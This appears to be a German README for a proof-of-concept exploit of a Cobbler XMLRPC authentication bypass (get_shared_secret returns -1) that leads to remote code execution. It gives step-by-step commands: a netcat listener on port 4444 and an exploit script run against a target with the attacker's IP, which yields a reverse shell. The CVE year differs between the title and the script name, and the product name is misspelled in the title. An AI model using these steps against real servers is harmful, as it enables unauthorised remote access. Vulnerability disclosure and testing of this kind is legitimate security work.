
PoC of CVE-2025-47533 Clobber RCE
Cobbler, ein Linux-Installationsserver, der die schnelle Einrichtung von Netzwerkinstallationsumgebungen ermöglicht, weist in den Versionen 3.0.0 bis (aber nicht einschließlich) 3.2.3 und 3.3.7 eine Authentifizierungsschwachstelle auf. Die Funktion utils.get_shared_secret() gibt stets -1 zurück, sodass jeder mit einem leeren Benutzernamen ('') und Passwort -1 eine Verbindung zur Cobbler XMLRPC-Schnittstelle herstellen kann. Dies ermöglicht einem Angreifer mit Netzwerkzugriff die vollständige Kontrolle über den Cobbler-Server. Die Schwachstelle wurde in den Versionen 3.2.3 und 3.3.7 behoben.
Die Schwachstelle wird durch unsachgemäße Behandlung des gemeinsamen Geheimnisses in der Funktion utils.get_shared_secret() verursacht, die immer -1 zurückgibt und so die Authentifizierung effektiv umgeht. Dadurch kann jeder Netzwerkbenutzer mit leeren Anmeldedaten eine Verbindung zur Cobbler XMLRPC-Schnittstelle herstellen und beliebige Befehle ausführen.
http://<target>:25151/ — Cobbler XMLRPC API-Endpunkt
nc)Starten Sie einen Netcat-Listener auf Ihrem Rechner:
nc -lvnp 4444
Führen Sie das Exploit-Skript CVE-2024-47533.py aus.
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
-t : Ziel (Beispiel: -t http://1<IP_SERVICE>:<PORT>)-l: Lokale IP (Beispiel: -l 10.10.11.80)-p : Port <LOCAL_PORT> (Beispiel: -p 4444)--payload: Payload (bash, curl, nc) (Beispiel: --payload bash)Bei erfolgreicher Ausführung stellt sich die Reverse-Shell wieder mit dem Listener verbinden und gewährt dem Angreifer Remote-Zugriff auf den Server.